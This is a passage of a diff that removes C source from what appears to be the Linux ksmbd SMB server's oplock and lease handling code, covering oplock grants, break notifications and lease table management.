+-static void grant_write_oplock(struct oplock_info *opinfo_new, int req_oplock,
+-			       struct lease_ctx_info *lctx)
+-{
+-	struct lease *lease = opinfo_new->o_lease;
+-
+-	if (req_oplock == SMB2_OPLOCK_LEVEL_BATCH)
+-		opinfo_new->level = SMB2_OPLOCK_LEVEL_BATCH;
+-	else
+-		opinfo_new->level = SMB2_OPLOCK_LEVEL_EXCLUSIVE;
+-
+-	if (lctx) {
+-		lease->state = lctx->req_state;
+-		memcpy(lease->lease_key, lctx->lease_key, SMB2_LEASE_KEY_SIZE);
+-	}
+-}
+-
+-/**
+- * grant_read_oplock() - grant level2 oplock or read lease
+- * @opinfo_new:	new oplock info object
+- * @lctx:	lease context information
+- *
+- * Return:      0
+- */
+-static void grant_read_oplock(struct oplock_info *opinfo_new,
+-			      struct lease_ctx_info *lctx)
+-{
+-	struct lease *lease = opinfo_new->o_lease;
+-
+-	opinfo_new->level = SMB2_OPLOCK_LEVEL_II;
+-
+-	if (lctx) {
+-		lease->state = SMB2_LEASE_READ_CACHING_LE;
+-		if (lctx->req_state & SMB2_LEASE_HANDLE_CACHING_LE)
+-			lease->state |= SMB2_LEASE_HANDLE_CACHING_LE;
+-		memcpy(lease->lease_key, lctx->lease_key, SMB2_LEASE_KEY_SIZE);
+-	}
+-}
+-
+-/**
+- * grant_none_oplock() - grant none oplock or none lease
+- * @opinfo_new:	new oplock info object
+- * @lctx:	lease context information
+- *
+- * Return:      0
+- */
+-static void grant_none_oplock(struct oplock_info *opinfo_new,
+-			      struct lease_ctx_info *lctx)
+-{
+-	struct lease *lease = opinfo_new->o_lease;
+-
+-	opinfo_new->level = SMB2_OPLOCK_LEVEL_NONE;
+-
+-	if (lctx) {
+-		lease->state = 0;
+-		memcpy(lease->lease_key, lctx->lease_key, SMB2_LEASE_KEY_SIZE);
+-	}
+-}
+-
+-static inline int compare_guid_key(struct oplock_info *opinfo,
+-				   const char *guid1, const char *key1)
+-{
+-	const char *guid2, *key2;
+-
+-	guid2 = opinfo->conn->ClientGUID;
+-	key2 = opinfo->o_lease->lease_key;
+-	if (!memcmp(guid1, guid2, SMB2_CLIENT_GUID_SIZE) &&
+-	    !memcmp(key1, key2, SMB2_LEASE_KEY_SIZE))
+-		return 1;
+-
+-	return 0;
+-}
+-
+-/**
+- * same_client_has_lease() - check whether current lease request is
+- *		from lease owner of file
+- * @ci:		master file pointer
+- * @client_guid:	Client GUID
+- * @lctx:		lease context information
+- *
+- * Return:      oplock(lease) object on success, otherwise NULL
+- */
+-static struct oplock_info *same_client_has_lease(struct ksmbd_inode *ci,
+-						 char *client_guid,
+-						 struct lease_ctx_info *lctx)
+-{
+-	int ret;
+-	struct lease *lease;
+-	struct oplock_info *opinfo;
+-	struct oplock_info *m_opinfo = NULL;
+-
+-	if (!lctx)
+-		return NULL;
+-
+-	/*
+-	 * Compare lease key and client_guid to know request from same owner
+-	 * of same client
+-	 */
+-	read_lock(&ci->m_lock);
+-	list_for_each_entry(opinfo, &ci->m_op_list, op_entry) {
+-		if (!opinfo->is_lease)
+-			continue;
+-		read_unlock(&ci->m_lock);
+-		lease = opinfo->o_lease;
+-
+-		ret = compare_guid_key(opinfo, client_guid, lctx->lease_key);
+-		if (ret) {
+-			m_opinfo = opinfo;
+-			/* skip upgrading lease about breaking lease */
+-			if (atomic_read(&opinfo->breaking_cnt)) {
+-				read_lock(&ci->m_lock);
+-				continue;
+-			}
+-
+-			/* upgrading lease */
+-			if ((atomic_read(&ci->op_count) +
+-			     atomic_read(&ci->sop_count)) == 1) {
+-				if (lease->state ==
+-				    (lctx->req_state & lease->state)) {
+-					lease->state |= lctx->req_state;
+-					if (lctx->req_state &
+-						SMB2_LEASE_WRITE_CACHING_LE)
+-						lease_read_to_write(opinfo);
+-				}
+-			} else if ((atomic_read(&ci->op_count) +
+-				    atomic_read(&ci->sop_count)) > 1) {
+-				if (lctx->req_state ==
+-				    (SMB2_LEASE_READ_CACHING_LE |
+-				     SMB2_LEASE_HANDLE_CACHING_LE))
+-					lease->state = lctx->req_state;
+-			}
+-
+-			if (lctx->req_state && lease->state ==
+-			    SMB2_LEASE_NONE_LE)
+-				lease_none_upgrade(opinfo, lctx->req_state);
+-		}
+-		read_lock(&ci->m_lock);
+-	}
+-	read_unlock(&ci->m_lock);
+-
+-	return m_opinfo;
+-}
+-
+-static void wait_for_break_ack(struct oplock_info *opinfo)
+-{
+-	int rc = 0;
+-
+-	rc = wait_event_interruptible_timeout(opinfo->oplock_q,
+-					      opinfo->op_state == OPLOCK_STATE_NONE ||
+-					      opinfo->op_state == OPLOCK_CLOSING,
+-					      OPLOCK_WAIT_TIME);
+-
+-	/* is this a timeout ? */
+-	if (!rc) {
+-		if (opinfo->is_lease)
+-			opinfo->o_lease->state = SMB2_LEASE_NONE_LE;
+-		opinfo->level = SMB2_OPLOCK_LEVEL_NONE;
+-		opinfo->op_state = OPLOCK_STATE_NONE;
+-	}
+-}
+-
+-static void wake_up_oplock_break(struct oplock_info *opinfo)
+-{
+-	clear_bit_unlock(0, &opinfo->pending_break);
+-	/* memory barrier is needed for wake_up_bit() */
+-	smp_mb__after_atomic();
+-	wake_up_bit(&opinfo->pending_break, 0);
+-}
+-
+-static int oplock_break_pending(struct oplock_info *opinfo, int req_op_level)
+-{
+-	while (test_and_set_bit(0, &opinfo->pending_break)) {
+-		wait_on_bit(&opinfo->pending_break, 0, TASK_UNINTERRUPTIBLE);
+-
+-		/* Not immediately break to none. */
+-		opinfo->open_trunc = 0;
+-
+-		if (opinfo->op_state == OPLOCK_CLOSING)
+-			return -ENOENT;
+-		else if (!opinfo->is_lease && opinfo->level <= req_op_level)
+-			return 1;
+-	}
+-
+-	if (!opinfo->is_lease && opinfo->level <= req_op_level) {
+-		wake_up_oplock_break(opinfo);
+-		return 1;
+-	}
+-	return 0;
+-}
+-
+-static inline int allocate_oplock_break_buf(struct ksmbd_work *work)
+-{
+-	work->response_buf = kzalloc(MAX_CIFS_SMALL_BUFFER_SIZE, GFP_KERNEL);
+-	if (!work->response_buf)
+-		return -ENOMEM;
+-	work->response_sz = MAX_CIFS_SMALL_BUFFER_SIZE;
+-	return 0;
+-}
+-
+-/**
+- * __smb2_oplock_break_noti() - send smb2 oplock break cmd from conn
+- * to client
+- * @wk:     smb work object
+- *
+- * There are two ways this function can be called. 1- while file open we break
+- * from exclusive/batch lock to levelII oplock and 2- while file write/truncate
+- * we break from levelII oplock no oplock.
+- * work->request_buf contains oplock_info.
+- */
+-static void __smb2_oplock_break_noti(struct work_struct *wk)
+-{
+-	struct smb2_oplock_break *rsp = NULL;
+-	struct ksmbd_work *work = container_of(wk, struct ksmbd_work, work);
+-	struct ksmbd_conn *conn = work->conn;
+-	struct oplock_break_info *br_info = work->request_buf;
+-	struct smb2_hdr *rsp_hdr;
+-	struct ksmbd_file *fp;
+-
+-	fp = ksmbd_lookup_durable_fd(br_info->fid);
+-	if (!fp)
+-		goto out;
+-
+-	if (allocate_oplock_break_buf(work)) {
+-		pr_err("smb2_allocate_rsp_buf failed! ");
+-		ksmbd_fd_put(work, fp);
+-		goto out;
+-	}
+-
+-	rsp_hdr = smb2_get_msg(work->response_buf);
+-	memset(rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
+-	*(__be32 *)work->response_buf =
+-		cpu_to_be32(conn->vals->header_size);
+-	rsp_hdr->ProtocolId = SMB2_PROTO_NUMBER;
+-	rsp_hdr->StructureSize = SMB2_HEADER_STRUCTURE_SIZE;
+-	rsp_hdr->CreditRequest = cpu_to_le16(0);
+-	rsp_hdr->Command = SMB2_OPLOCK_BREAK;
+-	rsp_hdr->Flags = (SMB2_FLAGS_SERVER_TO_REDIR);
+-	rsp_hdr->NextCommand = 0;
+-	rsp_hdr->MessageId = cpu_to_le64(-1);
+-	rsp_hdr->Id.SyncId.ProcessId = 0;
+-	rsp_hdr->Id.SyncId.TreeId = 0;
+-	rsp_hdr->SessionId = 0;
+-	memset(rsp_hdr->Signature, 0, 16);
+-
+-	rsp = smb2_get_msg(work->response_buf);
+-
+-	rsp->StructureSize = cpu_to_le16(24);
+-	if (!br_info->open_trunc &&
+-	    (br_info->level == SMB2_OPLOCK_LEVEL_BATCH ||
+-	     br_info->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE))
+-		rsp->OplockLevel = SMB2_OPLOCK_LEVEL_II;
+-	else
+-		rsp->OplockLevel = SMB2_OPLOCK_LEVEL_NONE;
+-	rsp->Reserved = 0;
+-	rsp->Reserved2 = 0;
+-	rsp->PersistentFid = fp->persistent_id;
+-	rsp->VolatileFid = fp->volatile_id;
+-
+-	inc_rfc1001_len(work->response_buf, 24);
+-
+-	ksmbd_debug(OPLOCK,
+-		    "sending oplock break v_id %llu p_id = %llu lock level = %d\n",
+-		    rsp->VolatileFid, rsp->PersistentFid, rsp->OplockLevel);
+-
+-	ksmbd_fd_put(work, fp);
+-	ksmbd_conn_write(work);
+-
+-out:
+-	ksmbd_free_work_struct(work);
+-}
+-
+-/**
+- * smb2_oplock_break_noti() - send smb2 exclusive/batch to level2 oplock
+- *		break command from server to client
+- * @opinfo:		oplock info object
+- *
+- * Return:      0 on success, otherwise error
+- */
+-static int smb2_oplock_break_noti(struct oplock_info *opinfo)
+-{
+-	struct ksmbd_conn *conn = opinfo->conn;
+-	struct oplock_break_info *br_info;
+-	int ret = 0;
+-	struct ksmbd_work *work = ksmbd_alloc_work_struct();
+-
+-	if (!work)
+-		return -ENOMEM;
+-
+-	br_info = kmalloc(sizeof(struct oplock_break_info), GFP_KERNEL);
+-	if (!br_info) {
+-		ksmbd_free_work_struct(work);
+-		return -ENOMEM;
+-	}
+-
+-	br_info->level = opinfo->level;
+-	br_info->fid = opinfo->fid;
+-	br_info->open_trunc = opinfo->open_trunc;
+-
+-	work->request_buf = (char *)br_info;
+-	work->conn = conn;
+-	work->sess = opinfo->sess;
+-
+-	if (opinfo->op_state == OPLOCK_ACK_WAIT) {
+-		INIT_WORK(&work->work, __smb2_oplock_break_noti);
+-		ksmbd_queue_work(work);
+-
+-		wait_for_break_ack(opinfo);
+-	} else {
+-		__smb2_oplock_break_noti(&work->work);
+-		if (opinfo->level == SMB2_OPLOCK_LEVEL_II)
+-			opinfo->level = SMB2_OPLOCK_LEVEL_NONE;
+-	}
+-	return ret;
+-}
+-
+-/**
+- * __smb2_lease_break_noti() - send lease break command from server
+- * to client
+- * @wk:     smb work object
+- */
+-static void __smb2_lease_break_noti(struct work_struct *wk)
+-{
+-	struct smb2_lease_break *rsp = NULL;
+-	struct ksmbd_work *work = container_of(wk, struct ksmbd_work, work);
+-	struct lease_break_info *br_info = work->request_buf;
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_hdr *rsp_hdr;
+-
+-	if (allocate_oplock_break_buf(work)) {
+-		ksmbd_debug(OPLOCK, "smb2_allocate_rsp_buf failed! ");
+-		goto out;
+-	}
+-
+-	rsp_hdr = smb2_get_msg(work->response_buf);
+-	memset(rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
+-	*(__be32 *)work->response_buf =
+-		cpu_to_be32(conn->vals->header_size);
+-	rsp_hdr->ProtocolId = SMB2_PROTO_NUMBER;
+-	rsp_hdr->StructureSize = SMB2_HEADER_STRUCTURE_SIZE;
+-	rsp_hdr->CreditRequest = cpu_to_le16(0);
+-	rsp_hdr->Command = SMB2_OPLOCK_BREAK;
+-	rsp_hdr->Flags = (SMB2_FLAGS_SERVER_TO_REDIR);
+-	rsp_hdr->NextCommand = 0;
+-	rsp_hdr->MessageId = cpu_to_le64(-1);
+-	rsp_hdr->Id.SyncId.ProcessId = 0;
+-	rsp_hdr->Id.SyncId.TreeId = 0;
+-	rsp_hdr->SessionId = 0;
+-	memset(rsp_hdr->Signature, 0, 16);
+-
+-	rsp = smb2_get_msg(work->response_buf);
+-	rsp->StructureSize = cpu_to_le16(44);
+-	rsp->Epoch = br_info->epoch;
+-	rsp->Flags = 0;
+-
+-	if (br_info->curr_state & (SMB2_LEASE_WRITE_CACHING_LE |
+-			SMB2_LEASE_HANDLE_CACHING_LE))
+-		rsp->Flags = SMB2_NOTIFY_BREAK_LEASE_FLAG_ACK_REQUIRED;
+-
+-	memcpy(rsp->LeaseKey, br_info->lease_key, SMB2_LEASE_KEY_SIZE);
+-	rsp->CurrentLeaseState = br_info->curr_state;
+-	rsp->NewLeaseState = br_info->new_state;
+-	rsp->BreakReason = 0;
+-	rsp->AccessMaskHint = 0;
+-	rsp->ShareMaskHint = 0;
+-
+-	inc_rfc1001_len(work->response_buf, 44);
+-
+-	ksmbd_conn_write(work);
+-
+-out:
+-	ksmbd_free_work_struct(work);
+-}
+-
+-/**
+- * smb2_lease_break_noti() - break lease when a new client request
+- *			write lease
+- * @opinfo:		conains lease state information
+- *
+- * Return:	0 on success, otherwise error
+- */
+-static int smb2_lease_break_noti(struct oplock_info *opinfo)
+-{
+-	struct ksmbd_conn *conn = opinfo->conn;
+-	struct list_head *tmp, *t;
+-	struct ksmbd_work *work;
+-	struct lease_break_info *br_info;
+-	struct lease *lease = opinfo->o_lease;
+-
+-	work = ksmbd_alloc_work_struct();
+-	if (!work)
+-		return -ENOMEM;
+-
+-	br_info = kmalloc(sizeof(struct lease_break_info), GFP_KERNEL);
+-	if (!br_info) {
+-		ksmbd_free_work_struct(work);
+-		return -ENOMEM;
+-	}
+-
+-	br_info->curr_state = lease->state;
+-	br_info->new_state = lease->new_state;
+-	if (lease->version == 2)
+-		br_info->epoch = cpu_to_le16(++lease->epoch);
+-	else
+-		br_info->epoch = 0;
+-	memcpy(br_info->lease_key, lease->lease_key, SMB2_LEASE_KEY_SIZE);
+-
+-	work->request_buf = (char *)br_info;
+-	work->conn = conn;
+-	work->sess = opinfo->sess;
+-
+-	if (opinfo->op_state == OPLOCK_ACK_WAIT) {
+-		list_for_each_safe(tmp, t, &opinfo->interim_list) {
+-			struct ksmbd_work *in_work;
+-
+-			in_work = list_entry(tmp, struct ksmbd_work,
+-					     interim_entry);
+-			setup_async_work(in_work, NULL, NULL);
+-			smb2_send_interim_resp(in_work, STATUS_PENDING);
+-			list_del(&in_work->interim_entry);
+-		}
+-		INIT_WORK(&work->work, __smb2_lease_break_noti);
+-		ksmbd_queue_work(work);
+-		wait_for_break_ack(opinfo);
+-	} else {
+-		__smb2_lease_break_noti(&work->work);
+-		if (opinfo->o_lease->new_state == SMB2_LEASE_NONE_LE) {
+-			opinfo->level = SMB2_OPLOCK_LEVEL_NONE;
+-			opinfo->o_lease->state = SMB2_LEASE_NONE_LE;
+-		}
+-	}
+-	return 0;
+-}
+-
+-static void wait_lease_breaking(struct oplock_info *opinfo)
+-{
+-	if (!opinfo->is_lease)
+-		return;
+-
+-	wake_up_interruptible_all(&opinfo->oplock_brk);
+-	if (atomic_read(&opinfo->breaking_cnt)) {
+-		int ret = 0;
+-
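+-		/*
+-		 * Wait up to one second (HZ) for in-flight breaks to finish;
+-		 * on timeout, force the count to zero so we do not stall.
+-		 */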
+-		ret = wait_event_interruptible_timeout(opinfo->oplock_brk,
+-						       atomic_read(&opinfo->breaking_cnt) == 0,
+-						       HZ);
+-		if (!ret)
+-			atomic_set(&opinfo->breaking_cnt, 0);
+-	}
+-}
+-
+-static int oplock_break(struct oplock_info *brk_opinfo, int req_op_level)
+-{
+-	int err = 0;
+-
+-	/* Need to break exclusive/batch oplock, write lease or overwrite_if */
+-	ksmbd_debug(OPLOCK,
+-		    "request to send oplock(level : 0x%x) break notification\n",
+-		    brk_opinfo->level);
+-
+-	if (brk_opinfo->is_lease) {
+-		struct lease *lease = brk_opinfo->o_lease;
+-
+-		atomic_inc(&brk_opinfo->breaking_cnt);
+-
+-		err = oplock_break_pending(brk_opinfo, req_op_level);
+-		if (err)
+-			return err < 0 ? err : 0;
+-
+-		if (brk_opinfo->open_trunc) {
+-			/*
+-			 * A create with overwrite disposition triggers the
+-			 * lease break to none.
+-			 */
+-			lease->new_state = SMB2_LEASE_NONE_LE;
+-		} else {
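+-			/*
+-			 * Downgrade step by step: drop write caching first,
+-			 * keep handle caching if it was held, and fall back
+-			 * to read caching or none otherwise.
+-			 */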
+-			if (lease->state & SMB2_LEASE_WRITE_CACHING_LE) {
+-				if (lease->state & SMB2_LEASE_HANDLE_CACHING_LE)
+-					lease->new_state =
+-						SMB2_LEASE_READ_CACHING_LE |
+-						SMB2_LEASE_HANDLE_CACHING_LE;
+-				else
+-					lease->new_state =
+-						SMB2_LEASE_READ_CACHING_LE;
+-			} else {
+-				if (lease->state & SMB2_LEASE_HANDLE_CACHING_LE)
+-					lease->new_state =
+-						SMB2_LEASE_READ_CACHING_LE;
+-				else
+-					lease->new_state = SMB2_LEASE_NONE_LE;
+-			}
+-		}
+-
+-		if (lease->state & (SMB2_LEASE_WRITE_CACHING_LE |
+-				SMB2_LEASE_HANDLE_CACHING_LE))
+-			brk_opinfo->op_state = OPLOCK_ACK_WAIT;
+-		else
+-			atomic_dec(&brk_opinfo->breaking_cnt);
+-	} else {
+-		err = oplock_break_pending(brk_opinfo, req_op_level);
+-		if (err)
+-			return err < 0 ? err : 0;
+-
+-		if (brk_opinfo->level == SMB2_OPLOCK_LEVEL_BATCH ||
+-		    brk_opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE)
+-			brk_opinfo->op_state = OPLOCK_ACK_WAIT;
+-	}
+-
+-	if (brk_opinfo->is_lease)
+-		err = smb2_lease_break_noti(brk_opinfo);
+-	else
+-		err = smb2_oplock_break_noti(brk_opinfo);
+-
+-	ksmbd_debug(OPLOCK, "oplock granted = %d\n", brk_opinfo->level);
+-	if (brk_opinfo->op_state == OPLOCK_CLOSING)
+-		err = -ENOENT;
+-	wake_up_oplock_break(brk_opinfo);
+-
+-	wait_lease_breaking(brk_opinfo);
+-
+-	return err;
+-}
+-
+-void destroy_lease_table(struct ksmbd_conn *conn)
+-{
+-	struct lease_table *lb, *lbtmp;
+-	struct oplock_info *opinfo;
+-
+-	write_lock(&lease_list_lock);
+-	if (list_empty(&lease_table_list)) {
+-		write_unlock(&lease_list_lock);
+-		return;
+-	}
+-
+-	list_for_each_entry_safe(lb, lbtmp, &lease_table_list, l_entry) {
+-		if (conn && memcmp(lb->client_guid, conn->ClientGUID,
+-				   SMB2_CLIENT_GUID_SIZE))
+-			continue;
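+-		/*
+-		 * The RCU read lock is dropped before lease_del_list()
+-		 * modifies the list, so restart the scan from the head
+-		 * after each removal.
+-		 */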
+-again:
+-		rcu_read_lock();
+-		list_for_each_entry_rcu(opinfo, &lb->lease_list,
+-					lease_entry) {
+-			rcu_read_unlock();
+-			lease_del_list(opinfo);
+-			goto again;
+-		}
+-		rcu_read_unlock();
+-		list_del(&lb->l_entry);
+-		kfree(lb);
+-	}
+-	write_unlock(&lease_list_lock);
+-}
+-
+-int find_same_lease_key(struct ksmbd_session *sess, struct ksmbd_inode *ci,
+-			struct lease_ctx_info *lctx)
+-{
+-	struct oplock_info *opinfo;
+-	int err = 0;
+-	struct lease_table *lb;
+-
+-	if (!lctx)
+-		return err;
+-
+-	read_lock(&lease_list_lock);
+-	if (list_empty(&lease_table_list)) {
+-		read_unlock(&lease_list_lock);
+-		return 0;
+-	}
+-
+-	list_for_each_entry(lb, &lease_table_list, l_entry) {
+-		if (!memcmp(lb->client_guid, sess->ClientGUID,
+-			    SMB2_CLIENT_GUID_SIZE))
+-			goto found;
+-	}
+-	read_unlock(&lease_list_lock);
+-
+-	return 0;
+-
+-found:
+-	rcu_read_lock();
+-	list_for_each_entry_rcu(opinfo, &lb->lease_list, lease_entry) {
+-		if (!atomic_inc_not_zero(&opinfo->refcount))
+-			continue;
+-		rcu_read_unlock();
+-		if (opinfo->o_fp->f_ci == ci)
+-			goto op_next;
+-		err = compare_guid_key(opinfo, sess->ClientGUID,
+-				       lctx->lease_key);
+-		if (err) {
+-			err = -EINVAL;
+-			ksmbd_debug(OPLOCK,
+-				    "same lease key is already in use by another file\n");
+-			opinfo_put(opinfo);
+-			goto out;
+-		}
+-op_next:
+-		opinfo_put(opinfo);
+-		rcu_read_lock();
+-	}
+-	rcu_read_unlock();
+-
+-out:
+-	read_unlock(&lease_list_lock);
+-	return err;
+-}
+-
+-static void copy_lease(struct oplock_info *op1, struct oplock_info *op2)
+-{
+-	struct lease *lease1 = op1->o_lease;
+-	struct lease *lease2 = op2->o_lease;
+-
+-	op2->level = op1->level;
+-	lease2->state = lease1->state;
+-	memcpy(lease2->lease_key, lease1->lease_key,
+-	       SMB2_LEASE_KEY_SIZE);
+-	lease2->duration = lease1->duration;
+-	lease2->flags = lease1->flags;
+-}
+-
+-static int add_lease_global_list(struct oplock_info *opinfo)
+-{
+-	struct lease_table *lb;
+-
+-	read_lock(&lease_list_lock);
+-	list_for_each_entry(lb, &lease_table_list, l_entry) {
+-		if (!memcmp(lb->client_guid, opinfo->conn->ClientGUID,
+-			    SMB2_CLIENT_GUID_SIZE)) {
+-			opinfo->o_lease->l_lb = lb;
+-			lease_add_list(opinfo);
+-			read_unlock(&lease_list_lock);
+-			return 0;
+-		}
+-	}
+-	read_unlock(&lease_list_lock);
+-
+-	lb = kmalloc(sizeof(struct lease_table), GFP_KERNEL);
+-	if (!lb)
+-		return -ENOMEM;
+-
+-	memcpy(lb->client_guid, opinfo->conn->ClientGUID,
+-	       SMB2_CLIENT_GUID_SIZE);
+-	INIT_LIST_HEAD(&lb->lease_list);
+-	spin_lock_init(&lb->lb_lock);
+-	opinfo->o_lease->l_lb = lb;
+-	lease_add_list(opinfo);
+-	lb_add(lb);
+-	return 0;
+-}
+-
+-static void set_oplock_level(struct oplock_info *opinfo, int level,
+-			     struct lease_ctx_info *lctx)
+-{
+-	switch (level) {
+-	case SMB2_OPLOCK_LEVEL_BATCH:
+-	case SMB2_OPLOCK_LEVEL_EXCLUSIVE:
+-		grant_write_oplock(opinfo, level, lctx);
+-		break;
+-	case SMB2_OPLOCK_LEVEL_II:
+-		grant_read_oplock(opinfo, lctx);
+-		break;
+-	default:
+-		grant_none_oplock(opinfo, lctx);
+-		break;
+-	}
+-}
+-
+-/**
+- * smb_grant_oplock() - handle oplock/lease request on file open
+- * @work:		smb work
+- * @req_op_level:	oplock level
+- * @pid:		id of open file
+- * @fp:			ksmbd file pointer
+- * @tid:		Tree id of connection
+- * @lctx:		lease context information on file open
+- * @share_ret:		share mode
+- *
+- * Return:      0 on success, otherwise error
+- */
+-int smb_grant_oplock(struct ksmbd_work *work, int req_op_level, u64 pid,
+-		     struct ksmbd_file *fp, __u16 tid,
+-		     struct lease_ctx_info *lctx, int share_ret)
+-{
+-	struct ksmbd_session *sess = work->sess;
+-	int err = 0;
+-	struct oplock_info *opinfo = NULL, *prev_opinfo = NULL;
+-	struct ksmbd_inode *ci = fp->f_ci;
+-	bool prev_op_has_lease;
+-	__le32 prev_op_state = 0;
+-
+-	/* directory leases are not supported */
+-	if (S_ISDIR(file_inode(fp->filp)->i_mode))
+-		return 0;
+-
+-	opinfo = alloc_opinfo(work, pid, tid);
+-	if (!opinfo)
+-		return -ENOMEM;
+-
+-	if (lctx) {
+-		err = alloc_lease(opinfo, lctx);
+-		if (err)
+-			goto err_out;
+-		opinfo->is_lease = 1;
+-	}
+-
+-	/* ci does not have any oplock */
+-	if (!opinfo_count(fp))
+-		goto set_lev;
+-
+-	/* grant none-oplock if second open is trunc */
+-	if (fp->attrib_only && fp->cdoption != FILE_OVERWRITE_IF_LE &&
+-	    fp->cdoption != FILE_OVERWRITE_LE &&
+-	    fp->cdoption != FILE_SUPERSEDE_LE) {
+-		req_op_level = SMB2_OPLOCK_LEVEL_NONE;
+-		goto set_lev;
+-	}
+-
+-	if (lctx) {
+-		struct oplock_info *m_opinfo;
+-
+-		/* is lease already granted ? */
+-		m_opinfo = same_client_has_lease(ci, sess->ClientGUID,
+-						 lctx);
+-		if (m_opinfo) {
+-			copy_lease(m_opinfo, opinfo);
+-			if (atomic_read(&m_opinfo->breaking_cnt))
+-				opinfo->o_lease->flags =
+-					SMB2_LEASE_FLAG_BREAK_IN_PROGRESS_LE;
+-			goto out;
+-		}
+-	}
+-	prev_opinfo = opinfo_get_list(ci);
+-	if (!prev_opinfo ||
+-	    (prev_opinfo->level == SMB2_OPLOCK_LEVEL_NONE && lctx)) {
+-		opinfo_conn_put(prev_opinfo);
+-		goto set_lev;
+-	}
+-	prev_op_has_lease = prev_opinfo->is_lease;
+-	if (prev_op_has_lease)
+-		prev_op_state = prev_opinfo->o_lease->state;
+-
+-	if (share_ret < 0 &&
+-	    prev_opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE) {
+-		err = share_ret;
+-		opinfo_conn_put(prev_opinfo);
+-		goto err_out;
+-	}
+-
+-	if (prev_opinfo->level != SMB2_OPLOCK_LEVEL_BATCH &&
+-	    prev_opinfo->level != SMB2_OPLOCK_LEVEL_EXCLUSIVE) {
+-		opinfo_conn_put(prev_opinfo);
+-		goto op_break_not_needed;
+-	}
+-
+-	list_add(&work->interim_entry, &prev_opinfo->interim_list);
+-	err = oplock_break(prev_opinfo, SMB2_OPLOCK_LEVEL_II);
+-	opinfo_conn_put(prev_opinfo);
+-	if (err == -ENOENT)
+-		goto set_lev;
+-	/* Check whether all oplocks were freed by close */
+-	else if (err < 0)
+-		goto err_out;
+-
+-op_break_not_needed:
+-	if (share_ret < 0) {
+-		err = share_ret;
+-		goto err_out;
+-	}
+-
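+-	/* Another open already holds an oplock, so grant at most level II */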
+-	if (req_op_level != SMB2_OPLOCK_LEVEL_NONE)
+-		req_op_level = SMB2_OPLOCK_LEVEL_II;
+-
+-	/* grant fixed oplock on stacked locking between lease and oplock */
+-	if (prev_op_has_lease && !lctx)
+-		if (prev_op_state & SMB2_LEASE_HANDLE_CACHING_LE)
+-			req_op_level = SMB2_OPLOCK_LEVEL_NONE;
+-
+-	if (!prev_op_has_lease && lctx) {
+-		req_op_level = SMB2_OPLOCK_LEVEL_II;
+-		lctx->req_state = SMB2_LEASE_READ_CACHING_LE;
+-	}
+-
+-set_lev:
+-	set_oplock_level(opinfo, req_op_level, lctx);
+-
+-out:
+-	rcu_assign_pointer(fp->f_opinfo, opinfo);
+-	opinfo->o_fp = fp;
+-
+-	opinfo_count_inc(fp);
+-	opinfo_add(opinfo);
+-	if (opinfo->is_lease) {
+-		err = add_lease_global_list(opinfo);
+-		if (err)
+-			goto err_out;
+-	}
+-
+-	return 0;
+-err_out:
+-	free_opinfo(opinfo);
+-	return err;
+-}
+-
+-/**
+- * smb_break_all_write_oplock() - break batch/exclusive oplock to level2
+- * @work:	smb work
+- * @fp:		ksmbd file pointer
+- * @is_trunc:	truncate on open
+- */
+-static void smb_break_all_write_oplock(struct ksmbd_work *work,
+-				       struct ksmbd_file *fp, int is_trunc)
+-{
+-	struct oplock_info *brk_opinfo;
+-
+-	brk_opinfo = opinfo_get_list(fp->f_ci);
+-	if (!brk_opinfo)
+-		return;
+-	if (brk_opinfo->level != SMB2_OPLOCK_LEVEL_BATCH &&
+-	    brk_opinfo->level != SMB2_OPLOCK_LEVEL_EXCLUSIVE) {
+-		opinfo_conn_put(brk_opinfo);
+-		return;
+-	}
+-
+-	brk_opinfo->open_trunc = is_trunc;
+-	list_add(&work->interim_entry, &brk_opinfo->interim_list);
+-	oplock_break(brk_opinfo, SMB2_OPLOCK_LEVEL_II);
+-	opinfo_conn_put(brk_opinfo);
+-}
+-
+-/**
+- * smb_break_all_levII_oplock() - send level2 oplock or read lease break command
+- *	from server to client
+- * @work:	smb work
+- * @fp:		ksmbd file pointer
+- * @is_trunc:	truncate on open
+- */
+-void smb_break_all_levII_oplock(struct ksmbd_work *work, struct ksmbd_file *fp,
+-				int is_trunc)
+-{
+-	struct oplock_info *op, *brk_op;
+-	struct ksmbd_inode *ci;
+-	struct ksmbd_conn *conn = work->conn;
+-
+-	if (!test_share_config_flag(work->tcon->share_conf,
+-				    KSMBD_SHARE_FLAG_OPLOCKS))
+-		return;
+-
+-	ci = fp->f_ci;
+-	op = opinfo_get(fp);
+-
+-	rcu_read_lock();
+-	list_for_each_entry_rcu(brk_op, &ci->m_op_list, op_entry) {
+-		if (!atomic_inc_not_zero(&brk_op->refcount))
+-			continue;
+-
+-		atomic_inc(&brk_op->conn->r_count);
+-		if (ksmbd_conn_releasing(brk_op->conn)) {
+-			atomic_dec(&brk_op->conn->r_count);
+-			continue;
+-		}
+-
+-		rcu_read_unlock();
+-		if (brk_op->is_lease && (brk_op->o_lease->state &
+-		    (~(SMB2_LEASE_READ_CACHING_LE |
+-				SMB2_LEASE_HANDLE_CACHING_LE)))) {
+-			ksmbd_debug(OPLOCK, "unexpected lease state(0x%x)\n",
+-				    brk_op->o_lease->state);
+-			goto next;
+-		} else if (brk_op->level !=
+-				SMB2_OPLOCK_LEVEL_II) {
+-			ksmbd_debug(OPLOCK, "unexpected oplock(0x%x)\n",
+-				    brk_op->level);
+-			goto next;
+-		}
+-
+-		/* Skip an oplock that is being broken to none */
+-		if (brk_op->is_lease &&
+-		    brk_op->o_lease->new_state == SMB2_LEASE_NONE_LE &&
+-		    atomic_read(&brk_op->breaking_cnt))
+-			goto next;
+-
+-		if (op && op->is_lease && brk_op->is_lease &&
+-		    !memcmp(conn->ClientGUID, brk_op->conn->ClientGUID,
+-			    SMB2_CLIENT_GUID_SIZE) &&
+-		    !memcmp(op->o_lease->lease_key, brk_op->o_lease->lease_key,
+-			    SMB2_LEASE_KEY_SIZE))
+-			goto next;
+-		brk_op->open_trunc = is_trunc;
+-		oplock_break(brk_op, SMB2_OPLOCK_LEVEL_NONE);
+-next:
+-		opinfo_conn_put(brk_op);
+-		rcu_read_lock();
+-	}
+-	rcu_read_unlock();
+-
+-	if (op)
+-		opinfo_put(op);
+-}
+-
+-/**
